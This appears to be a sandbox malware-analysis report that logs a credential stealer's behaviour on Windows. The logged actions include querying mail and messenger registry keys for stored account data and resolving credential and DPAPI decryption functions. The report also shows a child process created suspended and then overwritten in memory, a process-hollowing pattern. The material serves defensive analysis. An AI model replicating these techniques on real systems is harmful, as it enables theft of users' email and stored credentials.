Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - False 1
Open Key HKEY_CURRENT_USER\Software\IncrediMail\Identities - False 1
Open Key HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Group Mail - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\MessengerService - False 1
Open Key HKEY_CURRENT_USER\Software\Yahoo\Pager - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL - False 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail - False 1
Read Value HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} value_name = Username, data = Main Identity, type = REG_SZ True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, type = REG_BINARY True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server, type = REG_BINARY True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Display Name, type = REG_BINARY True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, type = REG_BINARY True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server, type = REG_BINARY True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = POP3 User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = IMAP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = SMTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = POP3 User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = IMAP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = HTTP User, data = 103, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders value_name = SMTP User, data = 103, type = REG_NONE False 1
Enumerate Keys HKEY_CURRENT_USER\Identities - True 1
Enumerate Keys HKEY_CURRENT_USER\Identities - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - False 1
Module (32)
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x75020000 True 1
Load shell32.dll base_address = 0x76480000 True 1
Load pstorec.dll base_address = 0x6fe60000 True 1
Load crypt32.dll base_address = 0x76260000 True 2
Load advapi32.dll base_address = 0x77740000 True 3
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 2
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x766cfb26 True 1
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x76295a7f True 2
Get Address c:\windows\syswow64\advapi32.dll function = CredReadA, address_out = 0x777871c1 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredFree, address_out = 0x7774b2ec True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredDeleteA, address_out = 0x77787941 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateA, address_out = 0x77787381 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateW, address_out = 0x77787481 True 3
System (2)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 1
Get Info type = Operating System True 1
Ini (7)
Operation Filename Additional Information Success Count Logfile
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = WinPos False 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Columns False 1
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Process #9: oyvgkgw.exe
Information Value
ID #9
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x64
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x89C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00120000 0x0015bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00141fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x0022ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x003b7fff Pagefile Backed Memory Readable True False False -
oyvgkgw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0cb7ffff Private Memory Readable, Writable True False False -
~dfa84a14a0862f3f78.tmp 0x0cac0000 0x0cb3ffff Memory Mapped File Readable, Writable True True False
private_0x000000000cb70000 0x0cb70000 0x0cb7ffff Private Memory Readable, Writable True False False -
private_0x000000000cbd0000 0x0cbd0000 0x0cccffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccd0000 0x0ccd0000 0x0ce50fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce60000 0x0ce60000 0x0e25ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e260000 0x0e260000 0x0e65ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e660000 0x0e92efff Memory Mapped File Readable False False False -
private_0x000000000e930000 0x0e930000 0x0ea6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ea0efff Pagefile Backed Memory Readable True False False -
private_0x000000000ea30000 0x0ea30000 0x0ea6ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eb60000 0x0eb60000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0edaffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ec9ffff Private Memory Readable, Writable True False False -
private_0x000000000ecd0000 0x0ecd0000 0x0ecdffff Private Memory Readable, Writable True False False -
private_0x000000000ed10000 0x0ed10000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000ed70000 0x0ed70000 0x0edaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000edb0000 0x0edb0000 0x0f1affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f1b0000 0x0f1b0000 0x0f5a2fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f5b0000 0x0fedffff Memory Mapped File Readable False False False -
private_0x000000000fee0000 0x0fee0000 0x100dffff Private Memory Readable, Writable True False False -
private_0x00000000100e0000 0x100e0000 0x104dffff Private Memory Readable, Writable True False False -
private_0x00000000104e0000 0x104e0000 0x10cdffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count
Get Info STD_INPUT_HANDLE type = file_type False 1
Get Info STD_OUTPUT_HANDLE type = file_type False 1
Get Info STD_ERROR_HANDLE type = file_type False 1
Get Info C:\Windows\system32\.HLP type = file_attributes False 2
Get Info C:\Windows\Help\.HLP type = file_attributes False 2
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Registry (4)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors - False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 value_name = AllowUnsafeObjectPassing, data = 68, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\ProgramData\oyvGkGw.exe os_pid = 0x62c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Thread (3)
Operation Process Additional Information Success Count
Get Context c:\programdata\oyvgkgw.exe os_tid = 0x89c True 1
Set Context c:\programdata\oyvgkgw.exe os_tid = 0x89c True 1
Resume c:\programdata\oyvgkgw.exe os_tid = 0x89c True 1
Memory (5)
Operation Process Additional Information Success Count
Allocate C:\ProgramData\oyvGkGw.exe address = 0x150004, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 277989832 True 1
Write C:\ProgramData\oyvGkGw.exe address = 0x400000, size = 512 True 1
Write C:\ProgramData\oyvGkGw.exe address = 0x43c000, size = 512 True 1
Write C:\ProgramData\oyvGkGw.exe address = 0x401000, size = 239104 True 1
Write C:\ProgramData\oyvGkGw.exe address = 0x7efde008, size = 4 True 1
Module (101)
Operation Module Additional Information Success Count
Load OLEAUT32.DLL base_address = 0x75a00000 True 1
Load SXS.DLL base_address = 0x752d0000 True 1
Load ntdll base_address = 0x77be0000 True 6
Load kernel32 base_address = 0x75fb0000 True 3
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Get Handle c:\programdata\oyvgkgw.exe base_address = 0x400000 True 1
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75a00000 True 1
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75be0000 True 1
Get Handle c:\windows\syswow64\user32.dll base_address = 0x771c0000 True 1
Get Filename - process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 3
Get Filename - process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 3
Get Filename c:\programdata\oyvgkgw.exe process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsTNT, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = DispCallFunc, address_out = 0x75a13dcf True 1
Get Address c:\windows\syswow64\oleaut32.dll function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromUdate, address_out = 0x75a17684 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = GetAltMonthNames, address_out = 0x75a4903a True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR4, address_out = 0x75a23f94 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR8, address_out = 0x75a24e9e True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromDate, address_out = 0x75a4db72 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromI4, address_out = 0x75a32a8c True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromCy, address_out = 0x75a4d737 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromDec, address_out = 0x75a4e015 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormat, address_out = 0x75a52055 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatDateTime, address_out = 0x75a520ea True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatNumber, address_out = 0x75a52151 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatPercent, address_out = 0x75a521f5 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatCurrency, address_out = 0x75a52288 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarWeekdayName, address_out = 0x75a52335 True 1
